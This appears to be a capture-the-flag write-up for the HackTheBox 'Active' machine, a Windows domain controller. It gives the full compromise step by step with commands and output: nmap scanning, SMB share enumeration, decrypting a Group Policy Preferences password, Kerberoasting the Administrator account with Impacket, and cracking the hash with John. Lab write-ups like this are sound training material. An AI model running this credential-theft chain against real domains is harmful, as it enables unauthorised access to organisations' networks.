Active

Easy Windows Active Directory HTB box

Reconnaissance

As always we start off by performing a port scan with the tool Nmap

nmap -p- --open -Pn -n --min-rate5000 -sS -sCV 10.10.10.100 -oN scan

# Nmap 7.95 scan initiated Wed Jul 30 13:54:34 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.044s latency).
Not shown: 64888 closed tcp ports (reset), 625 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-30 12:54:51Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49163/tcp open  msrpc         Microsoft Windows RPC
49174/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
|   date: 2025-07-30T12:55:48
|_  start_date: 2025-07-30T12:51:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 30 13:55:57 2025 -- 1 IP address (1 host up) scanned in 83.42 seconds

We see that the IP Points out to the domain active.htb so we add it into our /etc/hosts file

The SMB Service running on port 445 gives us a hint that we're facing a DC (Domain Controller) so let's enumerate it using smbmap

smbmap -H 10.10.10.100

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.10.100:445	Name: 10.10.10.100        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

We can see we have READ ACCESS to the /Replication share so let's see what's inside using smbclient

smbclient -N //10.10.10.100/Replication

After enumerating for a bit, under the following directory:\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ We find the file: Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
 name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
  uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
   changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Hash Cracking

We found a Username: SVC_TGS with a hashes password that we can crack using gpp-decrypt

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

And we got the password! --> GPPstillStandingStrong2k18

Let's try and enumerate the SMB Shares that this user has access to using SMBMap

smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.10.100:445	Name: 10.10.10.100        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
[*] Closed 1 connections

We see we have now access to three more shares: NETLOGON | SYSVOL | Users so let's start off by enumerating the Users share, where we can find the user.txt

After this we proceed to enumerate the RPC service using rpcclient

  rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
rpcclient $>

Kerberoasting

We see the Administrator account so if this account has an SPN (Service Principal Name) tied to it, we might be able to Kerberoast it.

Kerberoasting is a technique where we request a Kerberos service ticket (TGS) for an account with an SPN. The ticket comes back encrypted with the account’s NTLM hash so we can crack it offline

Let's try and perform this attack using impacket-GetUserSPNs

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2025-07-30 13:53:33.360639             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cb55d65694803a7c18c5d2a016407522$e10b576d9e01c51c9da067228dcc3d0c85bc1bcc4bf187b14a1496b8b76ebfbb79fe2207365b3646cba2cc84c6413cb78491ae8f61aafc4deeb2c62b868930c497d625fce6811eb44b989e485f54cd96b3b06b0fb248f1a7ad14bae1c27e7f4e2df788b55dc54caafc06db8401301b3a356ab2d727d0a6a3389862b897a98301fe74a8427298d6be338d3234d76584b9ee58c51ecc5380bf917a8bd56732bc08ca3787dee431d0937f586d6493b74729e9002461d43bdafc029ef55510a9a3c70ef9d9e5e44654e3e5c27c766fa3f41e392c33d5946b81d36dbe02a482e17f08cdc8c011815230ced9db79f1026626ebf1ac89c44be883c135ea534c6f99d97e62ac06d5be7f970990430e4c2e934b0ccbcf58737f9d8d749cb84c6ac9441119d65bcfba4621f958857412cb305e0e346d55836892dcd0f9584e97275b57afcf07e5091687dd575fced50ec04ae888d008662ac68aefd8cf2edeb7f78322819971d52886077988570cfa22cd97df31d5141825b9c5c4cbcdfb7fd19291cbade6849dc5767726d560ebeb88376e8a7af8d1103e1c58261f766a3b3d8f1f0f67950a98ff3ba4b0d7f5ca056f10256b374eb27a41937b658acb8c3fdce318bbd868e1856c998706098670e3d2a352234188a5de0d48da1699ad5559b20d0c8e1acd1b6f9465826ab9a6f63321816dcdcd8227de00d6ffa711ef3c01ed1aa813cf0c80c80147071331f88845fbbb3a67f32f3d8e3410580f1fb4cd2e97a3e4feddf99b728b8f80b7baf10cbb17ddd8b980531d305b05d06338c4aa3d1632615b4bb04250622db58d9e62c0cb215d6e63888f2e0135ff4ab0d91eb46519ac24ba8291abba09b392aaa849424e95f8fa78a4a4c22fa7c6a69658f99e0fcd87a4486496d587649520d5dbead6b4cb5b705ebc7ef95d4ac19d1ff6bb3839693462d4c815d75daf9b71b6cf288538c41ee5f2086975be353870cee301d7f77f2aa8f0212d696284ac15daaadaa5018abdafa46d5586380aff7c8c7e5696458b0f32d1db000e27c44ffd5c21b06116b74a6affc3d99da2a2b8cacfaa5428332943a4d0424370adc6837368c8cbf2b6ef2d6f7fcc0017d6dfc52b84a9600507d3c9fd2566ec951b49443abdd4b0eaf5e75f9183cd9cc3382846632da3d6ecc498f97305a7be1d2c6cd3007639a81c957ec536c431617efeddc5bb3e7cca232b673916b540ca78da5cd9a3c0821ac4927c98910278ce0ec2abbb3e9a08f21782

We successfully dumped the hash! let's try and crack it using john

john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:03 DONE (2025-07-30 15:54) 0.3225g/s 3400Kp/s 3400Kc/s 3400KC/s Tiffani143..Tekabunare
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We successfully cracked the Administrator's password — Ticketmaster1968

Let's login via SMB to see the root.txt flag

smbclient -U Administrator //10.10.10.100/Users

------- SNIP --------

smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 16:49:47 2021
  ..                                 DR        0  Thu Jan 21 16:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 14:50:10 2018
  root.txt                           AR       34  Wed Jul 30 13:53:29 2025

		5217023 blocks of size 4096. 279034 blocks available
smb: \Administrator\Desktop\> get root.txt

Hope you liked this Write-Up and see you next time!!

PreviousEasy NextForest

Last updated 5 months ago

hashtagReconnaissance

hashtagHash Cracking

hashtagKerberoasting

Reconnaissance

Hash Cracking

Kerberoasting